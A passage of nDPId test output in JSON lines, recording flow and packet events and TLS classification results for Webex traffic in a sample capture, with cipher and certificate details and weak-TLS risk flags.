{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628117,"flow_last_seen":1444570628117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628117,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWFAABAGRHG5P5MKCoXOLwG71XvsAB+9Nk1+uVAR\/\/\/y2QAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631058,"flow_last_seen":1444570631058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570631058,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1444570631058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAA0G+BAAEAG6O4Khc4vaxTyLOg3Abv3v7ExKrw8QIARAiEILgAAAQEICgBMwOxXHSRB"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1444570631058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAAoAWRAABAGM3drFPIsCoXOLwG76DcqvDxA97+xMlAQ\/\/9\/\/QAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1444570631059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631059,"pkt":"ABoRAAACABoRAAABCABFAAAoAWVAABAGM3ZrFPIsCoXOLwG76DcqvDxA97+xMlAR\/\/9\/\/AAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631722,"flow_last_seen":1444570631722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570631722,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 